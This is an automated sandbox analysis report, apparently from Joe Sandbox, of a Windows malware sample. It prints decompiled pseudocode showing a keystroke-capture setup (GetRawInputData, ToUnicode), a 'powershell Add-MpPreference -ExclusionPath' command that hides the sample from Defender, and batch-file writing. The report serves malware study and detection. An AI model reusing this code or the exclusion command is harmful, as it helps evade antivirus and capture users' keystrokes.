                                                                    • Instruction ID: 747ecfe378fcdbe344bc1308490f314615e76d4ea468bb4a39ec222de6635490
                                                                    • Opcode Fuzzy Hash: c9d0c52ceeb2ece4af80d2a752e57d3045f533b3a738838535b569a1aa2775ae
                                                                    • Instruction Fuzzy Hash: 3331A3B0F903A4B7AB59BF65B85196E776BDFE4700F44449AA80257B80CF704E49CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 80%
                                                                    			E02D199A8() {
                                                                    				intOrPtr _t1;
                                                                    				intOrPtr _t5;
                                                                    
                                                                    				_t1 = 5;
                                                                    				 *0x2e5db0c = _t1;
                                                                    				 *0x2e5d0f4 = 0;
                                                                    				 *0x2e5db04 = _t1;
                                                                    				 *0x2e5db08 = 0;
                                                                    				E02D11875(0x2e5db00, 0);
                                                                    				InitializeCriticalSection(0x2e5db10);
                                                                    				E02D1FECE(0x2e5db3c, 0);
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				 *0x2e5db28 = 0;
                                                                    				asm("movups [0x2e5db54], xmm0");
                                                                    				 *0x2e5db38 = 0;
                                                                    				_t19 = LoadLibraryW(L"User32.dll");
                                                                    				_push(0x2e5db3c);
                                                                    				_t5 = E02D20969(_t4, "GetRawInputData", 0); // executed
                                                                    				 *0x2e5db2c = _t5;
                                                                    				 *0x2e5db34 = E02D20969(_t19, "ToUnicode", 0);
                                                                    				 *0x2e5db30 = E02D20969(_t19, "MapVirtualKeyA", 0);
                                                                    				return 0x2e5d0e8;
                                                                    			}

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(02E5DB10,?,02D11221), ref: 02D199D3
                                                                    • LoadLibraryW.KERNEL32(User32.dll,?,02D11221), ref: 02D199FE
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Strings
                                                                    Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                                    • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                                    • API String ID: 4274177235-2474467583
                                                                    • Opcode ID: d3c57bee4aa800dee3a3dc0a9cea26b1c3563806fd4788cf103fce285bfa1f35
                                                                    • Instruction ID: 56d5db8e9b76557e7074e474b8534051ad41d860b21f7f814831edac5f1d6a7e
                                                                    • Opcode Fuzzy Hash: d3c57bee4aa800dee3a3dc0a9cea26b1c3563806fd4788cf103fce285bfa1f35
                                                                    • Instruction Fuzzy Hash: 63014F71EF0B309F9298AF667C3010A3B97D7A8604B51890AE805E7340EA300CD5DB5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 0040540A
                                                                    • VirtualProtect.KERNEL32(74707E90,00000100,00000040,?), ref: 0040542E
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 0040548E
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 004054AE
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000002), ref: 004054D0
                                                                    • Sleep.KERNEL32(00000320), ref: 00405505
                                                                    Memory Dump Source
• Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Virtual$AllocProtectSleep
                                                                    • String ID:
                                                                    • API String ID: 521561353-0
                                                                    • Opcode ID: 95ca5d20b4e5af5916642e185278758472d78cd8c41d50ca6c9c88b91116f6ec
                                                                    • Instruction ID: 786cb841dad3063349046433c84f3772dcb4d30a159cb99551377f828772fc83
                                                                    • Opcode Fuzzy Hash: 95ca5d20b4e5af5916642e185278758472d78cd8c41d50ca6c9c88b91116f6ec
                                                                    • Instruction Fuzzy Hash: 0241F834E447C49AD7024FB98D017F9FF70AF2A700F149269E9883B2A2DA7455C5CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E02D15CE2() {
                                                                    				struct _STARTUPINFOA _v72;
                                                                    				intOrPtr _t6;
                                                                    				int _t11;
                                                                    				intOrPtr _t15;
                                                                    				intOrPtr* _t16;
                                                                    				intOrPtr* _t18;
                                                                    				intOrPtr _t20;
                                                                    
                                                                    				_t16 = GetCommandLineA();
                                                                    				_t6 =  *_t16;
                                                                    				if(_t6 != 0x22) {
                                                                    					while(1) {
                                                                    						__eflags = _t6 - 0x20;
                                                                    						if(_t6 <= 0x20) {
                                                                    							break;
                                                                    						}
                                                                    						_t16 = _t16 + 1;
                                                                    						__eflags = _t16;
                                                                    						_t6 =  *_t16;
                                                                    					}
                                                                    					L12:
                                                                    					if(_t6 != 0) {
                                                                    						__eflags = _t6 - 0x20;
                                                                    						if(_t6 > 0x20) {
                                                                    							goto L13;
                                                                    						}
                                                                    						_t16 = _t16 + 1;
                                                                    						__eflags = _t16;
                                                                    						L11:
                                                                    						_t6 =  *_t16;
                                                                    						goto L12;
                                                                    					}
                                                                    					L13:
                                                                    					_t2 =  &(_v72.dwFlags);
                                                                    					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                                                    					GetStartupInfoA( &_v72);
                                                                    					E02D15D70();
                                                                    					E02D15D9D(0x2d29000, 0x2d2902c);
                                                                    					GetModuleHandleA(0);
                                                                    					_t11 = E02D23457( *_t2, 0x2d29000, 0x2d29000); // executed
                                                                    					E02D15D85();
                                                                    					ExitProcess(_t11);
                                                                    				}
                                                                    				_t18 = _t16 + 1;
                                                                    				_t20 =  *_t18;
                                                                    				if(_t20 == 0) {
                                                                    					L5:
                                                                    					_t1 = _t18 + 1; // 0x3
                                                                    					_t14 =  !=  ? _t18 : _t1;
                                                                    					_t16 =  !=  ? _t18 : _t1;
                                                                    					goto L11;
                                                                    				}
                                                                    				_t15 = _t20;
                                                                    				while(1) {
                                                                    					_t20 = _t15;
                                                                    					if(_t15 == 0x22) {
                                                                    						goto L5;
                                                                    					}
                                                                    					_t18 = _t18 + 1;
                                                                    					_t20 =  *_t18;
                                                                    					_t15 = _t20;
                                                                    					if(_t20 != 0) {
                                                                    						continue;
                                                                    					}
                                                                    					goto L5;
                                                                    				}
                                                                    				goto L5;
                                                                    			}

                                                                    APIs
                                                                    • GetCommandLineA.KERNEL32 ref: 02D15CE9
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 02D15D38
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D15D54
                                                                    • ExitProcess.KERNEL32 ref: 02D15D69
                                                                    Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                    • String ID:
                                                                    • API String ID: 2164999147-0
                                                                    • Opcode ID: 082f514d9492019f66f40e96f8b195e2f4d0b1e86f7704a945cbb97bce12342a
                                                                    • Instruction ID: 746ab497c6ed6e681665e1e54ac8854017c1c3ea5e27065c27a9f2c8b469ae92
                                                                    • Opcode Fuzzy Hash: 082f514d9492019f66f40e96f8b195e2f4d0b1e86f7704a945cbb97bce12342a
                                                                    • Instruction Fuzzy Hash: FB01D2285442483EDB352AB4B48D7EA3BA69FA6208FE42088D49287702D71A4C0BCB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 424 2d21e21-2d21e59 call 2d11085 CreateFileA 427 2d21e5b 424->427 428 2d21e5e-2d21e7a GetFileSize ReadFile 424->428 427->428 429 2d21e7e-2d21e8b FindCloseChangeNotification 428->429 430 2d21e7c 428->430 430->429
                                                                    C-Code - Quality: 91%
                                                                    			E02D21E21(CHAR* __ecx, signed int* __edx) {
                                                                    				long _v8;
                                                                    				void* _t5;
                                                                    				long _t6;
                                                                    				signed int _t7;
                                                                    				void* _t11;
                                                                    				signed int* _t18;
                                                                    				void* _t22;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t18 = __edx;
                                                                    				_t11 = E02D11085(0x400000);
                                                                    				_v8 = 0;
                                                                    				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                                    				_t22 = _t5;
                                                                    				if(_t22 == 0xffffffff) {
                                                                    					 *_t18 =  *_t18 & 0x00000000;
                                                                    				}
                                                                    				_t6 = GetFileSize(_t22, 0);
                                                                    				 *_t18 = _t6;
                                                                    				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
                                                                    				if(_t7 == 0) {
                                                                    					 *_t18 =  *_t18 & _t7;
                                                                    				}
                                                                    				FindCloseChangeNotification(_t22); // executed
                                                                    				return _t11;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
                                                                    • String ID:
                                                                    • API String ID: 2557216016-0
                                                                    • Opcode ID: 4c42b979ffad63a26e41416352a318dec270603125490fd2ae8e9759f701ce3d
                                                                    • Instruction ID: aab140bb40b7fe9cf833d243e0b8404f38a6c173fe04df785356922a651db60e
                                                                    • Opcode Fuzzy Hash: 4c42b979ffad63a26e41416352a318dec270603125490fd2ae8e9759f701ce3d
                                                                    • Instruction Fuzzy Hash: 46F0C2B2F41220BFF3205B65AC09FBB77ACEB64725F214625FD15E22C0E7B09D1486A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E02D1FBFC() {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				void _v16;
                                                                    				long _t21;
                                                                    				void* _t22;
                                                                    
                                                                    				_t22 = 0;
                                                                    				_v8 = 0;
                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                                                    					_t21 = 4;
                                                                    					_v12 = _t21;
					_t21 = GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed; 0x14 = TokenIntegrityLevel
					_t22 = _t21 != 0 ? _v16 : 0; // keep the returned SID pointer only if the query succeeded
                                                                    				}
                                                                    				if(_v8 != 0) {
                                                                    					FindCloseChangeNotification(_v8); // executed
                                                                    				}
                                                                    				return 0 | _t22 != 0x00000000;
                                                                    			}

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
                                                                    • String ID:
                                                                    • API String ID: 2406157124-0
                                                                    • Opcode ID: 1dd038728853389b002d1e13d9471b318a48e34c268fadb6a6facefc06a34217
                                                                    • Instruction ID: 005850d38100ba5a68e12184f8a4cb753133f2a186953d8ca7a58f634a757c5c
                                                                    • Opcode Fuzzy Hash: 1dd038728853389b002d1e13d9471b318a48e34c268fadb6a6facefc06a34217
                                                                    • Instruction Fuzzy Hash: FDF04972D00218FFDB209BA0DE09BDEBBB8EF04701F124465E901E6280D7309E58EA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E02D22FD7(void* __ecx, void* __eflags) {
                                                                    				int _t16;
                                                                    				CHAR* _t21;
                                                                    				CHAR* _t22;
                                                                    
                                                                    				_t22 = E02D11085(0x100);
                                                                    				_t21 = E02D11085(0x100);
                                                                    				E02D11052(_t22, 0, 0x100);
                                                                    				E02D11052(_t21, 0, 0x100);
                                                                    				GetModuleFileNameA(0, _t22, 0x100); // executed
                                                                    				E02D1102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E02D11133("powershell Add-MpPreference -ExclusionPath "));
                                                                    				_t1 =  &(_t21[0x2b]); // 0x2b
                                                                    				E02D1102C(_t1, _t22, 3);
                                                                    				_t2 =  &(_t22[0xff]); // 0xff
                                                                    				E02D1102C(E02D11133(_t21) + _t21, _t2, 1);
                                                                    				_t16 = WinExec(_t21, 0); // executed
                                                                    				return _t16;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,745D0770,00000000,02D2364A), ref: 02D23008
                                                                    • WinExec.KERNEL32 ref: 02D2304E
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateExecFileModuleNameProcess
                                                                    • String ID: powershell Add-MpPreference -ExclusionPath
                                                                    • API String ID: 1183730998-2194938034
                                                                    • Opcode ID: 425746706ce62d801f527317122d74783d3bb23b078e4c1a9772ad96268d3838
                                                                    • Instruction ID: 56198b9db15bec25e4b411ed1cc7ffa7d71b4674fa58748b2fcc18f005607403
                                                                    • Opcode Fuzzy Hash: 425746706ce62d801f527317122d74783d3bb23b078e4c1a9772ad96268d3838
                                                                    • Instruction Fuzzy Hash: 91F0F6B1E4021076E23032B1BCC9FBF5A9ECF99751F200421F70CB1780EA68DD0449B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 525 2d21d35-2d21d5a CreateFileA 526 2d21d73-2d21d77 525->526 527 2d21d5c-2d21d6d WriteFile FindCloseChangeNotification 525->527 527->526
                                                                    C-Code - Quality: 86%
                                                                    			E02D21D35(CHAR* __ecx, void* __edx, long _a4) {
                                                                    				long _v8;
                                                                    				int _t4;
                                                                    				void* _t13;
                                                                    				void* _t16;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t13 = __edx;
                                                                    				_v8 = 0;
                                                                    				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                    				_t16 = _t4;
                                                                    				if(_t16 != 0xffffffff) {
                                                                    					WriteFile(_t16, _t13, _a4,  &_v8, 0); // executed
                                                                    					_t4 = FindCloseChangeNotification(_t16); // executed
                                                                    				}
                                                                    				return _t4;
                                                                    			}

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,02D212E0,00000000,?,?), ref: 02D21D4F
                                                                    • WriteFile.KERNEL32(00000000,00000000,745D0770,00000000,00000000,?,02D212E0,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 02D21D66
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,02D212E0,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?,?,?), ref: 02D21D6D
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                    • String ID:
                                                                    • API String ID: 3805958096-0
                                                                    • Opcode ID: 7d6416827e264b2402cf10492a282f8f222b8b6dc874da12c29a2092ebdf752f
                                                                    • Instruction ID: 12d106c68f0431a74c40a3fff280ea5c1d121f0463382ca8a3444830d3d13589
                                                                    • Opcode Fuzzy Hash: 7d6416827e264b2402cf10492a282f8f222b8b6dc874da12c29a2092ebdf752f
                                                                    • Instruction Fuzzy Hash: 1EE09BB2501118BFE3111BD9EC88DEB7B6CDB953A8F114625F9159218092304D054674
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 528 2d20bd9-2d20c1c call 2d11052 CreateProcessW 531 2d20c28 528->531 532 2d20c1e-2d20c26 528->532 533 2d20c2a-2d20c2d 531->533 532->533
                                                                    C-Code - Quality: 100%
                                                                    			E02D20BD9(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                    				struct _STARTUPINFOW _v88;
                                                                    				int _t12;
                                                                    				void** _t22;
                                                                    
                                                                    				_t22 = __ecx;
                                                                    				E02D11052( &_v88, 0, 0x44);
                                                                    				_v88.cb = 0x44;
                                                                    				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                                                                    				if(_t12 == 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				 *_t22 = _v20.hProcess;
                                                                    				return 1;
                                                                    			}

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: D
                                                                    • API String ID: 963392458-2746444292
                                                                    • Opcode ID: 816af88f412b4cd512c6dcf7e118e7880341ebe4fdcdf3750f4af8fcd178f3dd
                                                                    • Instruction ID: 0b654273d5ba3c11781bef68e51ca5c81a4fa61a670711374dc6dcc6e5791b75
                                                                    • Opcode Fuzzy Hash: 816af88f412b4cd512c6dcf7e118e7880341ebe4fdcdf3750f4af8fcd178f3dd
                                                                    • Instruction Fuzzy Hash: 97F030B2600219AFDB10DFE4D885DAB77BDEF54348B008825E6469B240E674DD0CCB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D15A10(char __ecx, void* __edx, void* __eflags) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				char _v24;
                                                                    				intOrPtr _v48;
                                                                    				intOrPtr _v52;
                                                                    				intOrPtr _v56;
                                                                    				char _v76;
                                                                    				char _v100;
                                                                    				char _v108;
                                                                    				char _v148;
                                                                    				void* _t86;
                                                                    				void* _t97;
                                                                    				void* _t101;
                                                                    				void* _t105;
                                                                    				void* _t109;
                                                                    				intOrPtr* _t130;
                                                                    				char _t179;
                                                                    				void* _t180;
                                                                    				void* _t181;
                                                                    				void* _t182;
                                                                    				void* _t183;
                                                                    				void* _t184;
                                                                    				void* _t185;
                                                                    				void* _t186;
                                                                    				intOrPtr _t188;
                                                                    				intOrPtr _t189;
                                                                    				intOrPtr _t190;
                                                                    				intOrPtr _t191;
                                                                    				intOrPtr* _t192;
                                                                    				void* _t193;
                                                                    
                                                                    				_t193 = __eflags;
                                                                    				_t179 = __ecx;
                                                                    				_v8 = __ecx;
                                                                    				Sleep(0x1f4); // executed
                                                                    				E02D2044F( &_v100, _t193);
                                                                    				E02D20346( &_v100, E02D21CA2( &_v100)); // executed
                                                                    				_t86 = E02D133BF( &_v12, ".bss"); // executed
                                                                    				E02D202B9( &_v100,  &_v148, _t86); // executed
                                                                    				E02D15EA5(_v12);
                                                                    				E02D1304C( &_v16,  &_v108);
                                                                    				E02D12E93(_t179 + 0x48,  &_v16);
                                                                    				E02D13036( &_v16);
                                                                    				E02D1595E(_t179,  &_v24);
                                                                    				_t130 = _v24;
                                                                    				_t188 =  *_t130;
                                                                    				_t97 = E02D21DC0(_t130 + 4, _t188); // executed
                                                                    				E02D13437(_t179 + 0x10, _t97); // executed
                                                                    				E02D15EA5(_v12);
                                                                    				_t20 = _t188 + 4; // 0x745d0774
                                                                    				_t180 = _t20;
                                                                    				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t130 + _t180));
                                                                    				_t189 =  *((intOrPtr*)(_t130 + _t180 + 4));
                                                                    				_t181 = _t180 + 8;
                                                                    				_t101 = E02D21DC0(_t130 + _t181, _t189);
                                                                    				_t28 = _v8 + 0x28; // 0x868ffff
                                                                    				E02D13437(_t28, _t101);
                                                                    				E02D15EA5(_v12);
                                                                    				_t182 = _t181 + _t189;
                                                                    				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t130 + _t182));
                                                                    				_t190 =  *((intOrPtr*)(_t130 + _t182 + 1));
                                                                    				_t183 = _t182 + 5;
                                                                    				_t105 = E02D21DC0(_t130 + _t183, _t190); // executed
                                                                    				_t38 = _v8 + 0x1c; // 0x8c8d5034, executed
                                                                    				E02D13437(_t38, _t105); // executed
                                                                    				E02D15EA5(_v12);
                                                                    				_t184 = _t183 + _t190;
                                                                    				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t130 + _t184));
                                                                    				_t191 =  *((intOrPtr*)(_t130 + _t184 + 1));
                                                                    				_t185 = _t184 + 5;
                                                                    				_t109 = E02D21DC0(_t130 + _t185, _t191); // executed
                                                                    				_t48 = _v8 + 0x24; // 0x1923e800, executed
                                                                    				E02D13437(_t48, _t109); // executed
                                                                    				E02D15EA5(_v12);
                                                                    				_t186 = _t185 + _t191;
                                                                    				_t192 = _v8;
                                                                    				 *((intOrPtr*)(_t192 + 0x2c)) =  *((intOrPtr*)(_t130 + _t186));
                                                                    				 *((intOrPtr*)(_t192 + 0x34)) =  *((char*)(_t130 + _t186 + 4));
                                                                    				 *((intOrPtr*)(_t192 + 0x38)) =  *((char*)(_t130 + _t186 + 5));
                                                                    				 *((intOrPtr*)(_t192 + 0x3c)) =  *((char*)(_t130 + _t186 + 6));
                                                                    				 *((intOrPtr*)(_t192 + 0x40)) =  *((char*)(_t130 + _t186 + 7));
                                                                    				 *((intOrPtr*)(_t192 + 0x44)) =  *((char*)(_t130 + _t186 + 8));
                                                                    				E02D21DC0(_t130 + 4 + _t186 + 9,  *((intOrPtr*)(_t130 + _t186 + 9))); // executed
                                                                    				_t72 = _t192 + 0x30; // 0x2d235ca, executed
                                                                    				E02D13437(_t72,  &_v8); // executed
                                                                    				 *_t192 = 1;
                                                                    				 *((intOrPtr*)(_t192 + 4)) = 1;
                                                                    				E02D15EA5(_v8);
                                                                    				E02D13036( &_v24);
                                                                    				E02D13036( &_v108);
                                                                    				_t169 = _v56;
                                                                    				if(_v56 != 0) {
                                                                    					E02D11E71(_t169, _t169);
                                                                    				}
                                                                    				_v56 = 0;
                                                                    				_v48 = 0;
                                                                    				_v52 = 0;
                                                                    				E02D13036( &_v76);
                                                                    				return E02D1FEED( &_v100, 0);
                                                                    			}

                                                                    APIs
                                                                    • Sleep.KERNEL32(000001F4,00000000,745D0770,00000000), ref: 02D15A26
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                                    • String ID: .bss
                                                                    • API String ID: 277671435-3890483948
                                                                    • Opcode ID: c60b9b9c6a6aafc75b7d53bb7afd979dbcf078cd6d358dd42841a595aacd8790
                                                                    • Instruction ID: 81a3937da53a5014b8caf83c0992c63855b730cba39b75a638644b7474f9f7eb
                                                                    • Opcode Fuzzy Hash: c60b9b9c6a6aafc75b7d53bb7afd979dbcf078cd6d358dd42841a595aacd8790
                                                                    • Instruction Fuzzy Hash: FE513E75904159AFCB14EFA0E9D08EEB7B6EF54304B6045AAC416AB745EF30AF05CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E02D13554(short** __ecx, intOrPtr _a4) {
                                                                    				short** _v8;
                                                                    				char* _t12;
                                                                    				void* _t15;
                                                                    				int _t35;
                                                                    				short** _t36;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_v8 = __ecx;
                                                                    				E02D131C3(_a4);
                                                                    				if( *__ecx != 0) {
                                                                    					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E02D13261(__ecx), 0, 0, 0, 0);
                                                                    					_t12 = E02D15EB4(_t35);
                                                                    					_t36 = _v8;
                                                                    					_t22 = _t12;
                                                                    					WideCharToMultiByte(0xfde9, 0,  *_t36, E02D13261(_t36), _t12, _t35, 0, 0);
                                                                    					_t15 = E02D133BF( &_v8, _t22); // executed
                                                                    					E02D13125(_a4, _t15); // executed
                                                                    					E02D15EA5(_v8);
                                                                    					E02D15EA5(_t22);
                                                                    				}
                                                                    				return _a4;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
